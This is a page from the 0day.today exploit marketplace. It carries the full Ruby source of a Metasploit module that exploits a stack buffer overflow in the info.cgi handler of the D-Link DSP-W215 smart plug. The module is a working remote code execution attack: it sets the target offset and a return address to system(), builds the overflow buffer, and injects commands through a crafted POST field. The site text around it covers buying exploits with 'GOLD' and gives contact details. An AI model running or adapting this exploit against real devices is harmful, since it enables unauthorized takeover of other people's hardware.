0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

D-Link DSP-W215 (info.cgi) POST Request Buffer Overflow Exploit

Author

metasploit

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link info.cgi POST Request Buffer Overflow',
      'Description'    => %q{
        This module exploits an anonymous remote code execution vulnerability on different D-Link
        devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
        when handling specially crafted POST HTTP requests addresses to the /common/info.cgi
        handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
        environment.
      },
      'Author'         =>
        [
          'Craig Heffner',   # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['OSVDB', '108249'],
          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
        ],
      'Targets'        =>
        [
          #
          # Automatic targeting via fingerprinting
          #
          [ 'Automatic Targeting', { 'auto' => true }  ],
          [ 'D-Link DSP-W215 - v1.02',
            {
              'Offset' => 477472,
              'Ret'    => 0x405cec # jump to system - my_cgi.cgi
            }
          ]
        ],
      'DisclosureDate' => 'May 22 2014',
      'DefaultTarget' => 0))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => "/common/info.cgi",
        'method'  => 'GET'
      })

      if res && [200, 301, 302].include?(res.code)
        if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
          @my_target = targets[1] if target['auto']
          return Exploit::CheckCode::Appears
        end

        return Exploit::CheckCode::Detected
      end

    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("#{peer} - Exploiting #{@my_target.name}...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 185
    )
  end

  def prepare_shellcode(cmd)
    buf = rand_text_alpha_upper(@my_target['Offset'])   # Stack filler
    buf << [@my_target.ret].pack("N")                   # Overwrite $ra -> jump to system

           # la $t9, system
           # la $s1, 0x440000
           # jalr $t9 ; system
           # addiu $a0, $sp, 0x28 # our command

    buf << rand_text_alpha_upper(40)                # Command to execute must be at $sp+0x28
    buf << cmd                                      # Command to execute
    buf << "\x00"                                   # NULL terminate the command
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)

    begin
      res = send_request_cgi({
        'method'        => 'POST',
        'uri'           => "/common/info.cgi",
        'encode_params' => false,
        'vars_post'     => {
          'storage_path' => shellcode,
        }
      }, 5)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

D-Link DSP-W215 (info.cgi) POST Request Buffer Overflow Exploit

Report Error

Report Error